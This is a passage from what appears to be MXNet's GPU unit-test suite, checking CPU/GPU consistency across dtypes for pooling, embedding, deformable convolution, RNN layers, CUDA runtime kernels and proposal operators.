sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type, p_value=2):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
if pool_type != 'lp':
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']
shape = (2, 2, 10, 10)
for act_type in act_types:
sym = mx.sym.Activation(name='act', act_type=act_type)
ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
@pytest.mark.skipif(os.environ.get('MXNET_ENGINE_TYPE') == 'NaiveEngine',
reason="Testing with naive engine consistently triggers illegal memory access. Tracked in #17713")
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
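        # low_pad/high_pad widen the sampled indices beyond [0, V) so out-of-range lookups are exercised (unsigned dtypes pass low_pad=0).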
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params, scale=0.1)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
@with_seed()
@pytest.mark.serial
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
@pytest.mark.serial
def test_deformable_psroipooling_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3,
np.dtype(np.float16): 1e-2}
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol,
grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed()
@pytest.mark.serial
def test_deformable_convolution_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol,
grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'})
@with_seed()
def test_deformable_convolution_options():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
# 2D convolution
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
# Pad > 0
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
# Stride > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
# Dilate > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
# Deformable group > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2, name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
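# Helpers: run the same Gluon RNN layer on GPU and CPU with identical inputs and initial states,
# then check that outputs and final states agree within tolerance.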
def check_rnn_layer(layer):
layer.initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
@with_seed()
@pytest.mark.serial
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@with_seed()
@pytest.mark.serial
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
@pytest.mark.serial
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
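# Autograd across devices: chain tanh ops with explicit cpu<->gpu copies, then compare the
# resulting gradient against a plain single-device tanh chain.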
@with_seed()
@pytest.mark.serial
def test_cross_device_autograd():
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.copy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad)
@with_seed()
@pytest.mark.serial
def test_multi_proposal_op():
# parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size, with_nms=False):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_prob = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
if not with_nms:
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
else:
# no 100% guarantee with NMS
assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10)
